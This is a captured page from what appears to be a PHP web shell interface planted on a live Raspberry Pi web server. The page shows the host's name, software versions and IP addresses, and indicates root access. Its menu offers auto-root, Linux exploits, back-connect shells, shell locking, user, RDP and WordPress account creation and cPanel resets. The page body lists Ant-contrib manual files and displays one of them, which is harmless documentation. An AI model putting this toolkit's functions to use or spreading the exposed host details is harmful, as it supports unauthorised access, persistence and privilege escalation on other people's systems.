Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.130
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
ant-contrib /
manual /
tasks /
[ HOME SHELL ]
Name
Size
Permission
Action
antcallback_task.html
4.29
KB
-rw-r--r--
antclipse_task.html
15.34
KB
-rw-r--r--
antfetch_task.html
3.96
KB
-rw-r--r--
assert_task.html
5.78
KB
-rw-r--r--
compilewithwalls.html
6.56
KB
-rw-r--r--
for.html
8.64
KB
-rw-r--r--
foreach.html
5.23
KB
-rw-r--r--
forget.html
1.72
KB
-rw-r--r--
get-cookie_task.html
2.65
KB
-rw-r--r--
get-method_task.html
524
B
-rw-r--r--
head-method_task.html
523
B
-rw-r--r--
http-client_type.html
6.16
KB
-rw-r--r--
http-state_type.html
4.81
KB
-rw-r--r--
if.html
3.24
KB
-rw-r--r--
importurl.html
7.63
KB
-rw-r--r--
index.html
365
B
-rw-r--r--
inifile.html
3.17
KB
-rw-r--r--
limit_task.html
4.42
KB
-rw-r--r--
math_task.html
9.92
KB
-rw-r--r--
method_task_common.html
7.26
KB
-rw-r--r--
more_conditions.html
6.54
KB
-rw-r--r--
osfamily.html
1.07
KB
-rw-r--r--
outofdate.html
10.1
KB
-rw-r--r--
pathtofileset.html
2.46
KB
-rw-r--r--
performance_monitor.html
4.36
KB
-rw-r--r--
post-method_task.html
4.13
KB
-rw-r--r--
post_task.html
7.63
KB
-rw-r--r--
propertycopy.html
2.28
KB
-rw-r--r--
propertyregex.html
4.57
KB
-rw-r--r--
propertyselector.html
4.18
KB
-rw-r--r--
relentless.html
4.6
KB
-rw-r--r--
runtarget.html
834
B
-rw-r--r--
server_tasks.html
8.5
KB
-rw-r--r--
shellscript.html
4.16
KB
-rw-r--r--
sortlist.html
4.78
KB
-rw-r--r--
stopwatch_task.html
2.34
KB
-rw-r--r--
switch.html
2.21
KB
-rw-r--r--
throw.html
1.1
KB
-rw-r--r--
timestampselector.html
4.36
KB
-rw-r--r--
toc.html
3.41
KB
-rw-r--r--
trycatch.html
2.75
KB
-rw-r--r--
urlencode.html
2.47
KB
-rw-r--r--
variable_task.html
6.02
KB
-rw-r--r--
verifydesign.html
14.37
KB
-rw-r--r--
verifylegacytutorial.html
4.34
KB
-rw-r--r--
verifynewprojtutorial.html
1.54
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : server_tasks.html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Ant-contrib Server Tasks</title> </head> <body> <h1>Ant-Contrib Server Tasks</h1> <p>The following tasks exist for running Ant server on one machine, and calling that server from another (or possibly the same) machine, to execute tasks.</p> <hr width="100%" /> <h1>AntServer</h1> <p> Starts an ANT server in current process. This server will wait for client connections, and when received, it will execute the commands that the client has sent. NOTE: This is a blocking call, and this task will not return until someone sends the server a shutdown command. </p> <h2>Parameters</h2> <table border="1" cellpadding="2" cellspacing="0"> <tr> <th>Attribute</th> <th>Description</th> <th>Required</th> </tr> <tr> <td valign="top">port</td> <td valign="top">The port on which the server will listen.</td> <td align="center" valign="top">No. Defaults to 17000</td> </tr> </table> <h2>Example:</h2> <pre> <code> <antserver port="12345" /> </code> </pre> <h1>RemoteAnt</h1> <p> Sends command requests to a running instance of an AntServer which was started using the <antserver> task. These commands are executed in the space of the server, and therefore have no access to any variables or references in the currently executing project. </p> <h2>Parameters</h2> <table border="1" cellpadding="2" cellspacing="0"> <tr> <th>Attribute</th> <th>Description</th> <th>Required</th> </tr> <tr> <td valign="top">machine</td> <td valign="top">The machine name on which the server is running.</td> <td align="center" valign="top">No. Defaults to "localhost"</td> </tr> <tr> <td valign="top">port</td> <td valign="top">The port on which the server is listening.</td> <td align="center" valign="top">No. Defaults to 17000</td> </tr> <tr> <td valign="top">persistant</td> <td valign="top">Should we execute all commands, regardless of whether or not one of them fails. If false, as soon as a failure is encountered, we will stop execution.</td> <td align="center" valign="top">No. Defaults to false</td> </tr> <tr> <td valign="top">failonerror</td> <td valign="top">If any of the sent commands encounters a build failure on the server, should we fail this task.</td> <td align="center" valign="top">No. Defaults to true.</td> </tr> </table> <h2>Parameters Specified as Nested Elements</h2> <p> The commands to send are represented as nested elements as described below </p> <h3>runtarget</h3> <p>Runs a target which is contained in the same buildfile where the <antserver> task was called. This element may contain nested <property> elements for sending parameters to the target, and nested <reference> elements for sending references to the target.</p> <h4>Parameters</h4> <table border="1" cellpadding="2" cellspacing="0"> <tr> <th>Attribute</th> <th>Description</th> <th>Required</th> </tr> <tr> <td valign="top">target</td> <td valign="top">The name of the target to run.</td> <td align="center" valign="top">Yes.</td> </tr> </table> <h3>runant</h3> <p>Runs a target in an arbitrary buildfile on the machine where the <antserver> task was called. If a relative pathname is given, then the path of the buildfile is relative to the base directory of the project where the <antserver> task was called. This element may contain nested <property> elements for sending text parameters to the target, and nested <reference> elements for sending references to the target.</p> <h4>Parameters</h4> <table border="1" cellpadding="2" cellspacing="0"> <tr> <th>Attribute</th> <th>Description</th> <th>Required</th> </tr> <tr> <td valign="top">antfile</td> <td valign="top">The path of the ant file to run (if relative, then the filename is computed relative to the buildfile of the server task's base directory</td> <td align="center" valign="top">No. Defaults to "build.xml" in the directory where the buildfile is to execute (specified by the dir attribute)</td> </tr> <tr> <td valign="top">target</td> <td valign="top">The name of the target to run.</td> <td align="center" valign="top">No. Defaults to the default target of the specified antfile.</td> </tr> <tr> <td valign="top">dir</td> <td valign="top">the directory to use as a basedir for the new Ant project. Defaults to the server project's basedir, unless inheritall has been set to false, in which case it doesn't have a default value. This will override the basedir setting of the called project.</td> <td align="center" valign="top">No.</td> </tr> <tr> <td valign="top">inheritall</td> <td valign="top">Should the target task inherit all of the server's properties. This is equivalent to the flag of the same name on the <ant> task.</td> <td align="center" valign="top">No. Defaults to false</td> </tr> <tr> <td valign="top">inheritrefs</td> <td valign="top">Should the target task inherit all of the server's references. This is equivalent to the flag of the same name on the <ant> task.</td> <td align="center" valign="top">No. Defaults to false</td> </tr> </table> <h3>shutdown</h3> <p>Instructs the <antserver> task to shut itself down. Control will return to the ANT engine and will procede as necessary in the server's buildfile.</p> <h2>Example:</h2> <pre> <code> <remoteant machine="localhost" port="12345"> <runtarget target="execute.build"> <property name="build.type" value="full" /> </runtarget> <runant dir="tests" target="build.tests"> <property name="build.type" value="full" /> <reference refid="my.ref" torefid="inherited.ref" /> </runtarget> </remoteant> </code> </pre> <p> would be the equivalent of running the following directly on the server machine, from within the same buildfile where the <antserver> task was run </p> <pre> <code> <antcall target="execute.build"> <param name="build.type" value="full" /> </antcall> <ant dir="tests"> <property name="build.type" value="full" /> <reference refid="my.ref" torefid="inherited.ref" /> </antcall> </code> </pre> <h3>sendfile</h3> <p>Sends a file from the client to the server</p> <h4>Parameters</h4> <table border="1" cellpadding="2" cellspacing="0"> <tr> <th>Attribute</th> <th>Description</th> <th>Required</th> </tr> <tr> <td valign="top">file</td> <td valign="top">The path of the file to send.</td> <td align="center" valign="top">Yes.</td> </tr> <tr> <td valign="top">tofile</td> <td valign="top">The filename where the file is to be stored on the server, if a relative path, then it is stored relative to the server project's base directory.</td> <td align="center" valign="top">No. If todir is specified</td> </tr> <tr> <td valign="top">tofile</td> <td valign="top">The directory where the file is to be stored on the server, if a relative path, then it is stored relative to the server project's base directory. The name of the file will be the same name as the source file</td> <td align="center" valign="top">No. If tofile is specified</td> </tr> </table> <hr> <p align="center">Copyright © 2003 Ant-Contrib Project. All rights Reserved.</p> </body> </html>
Close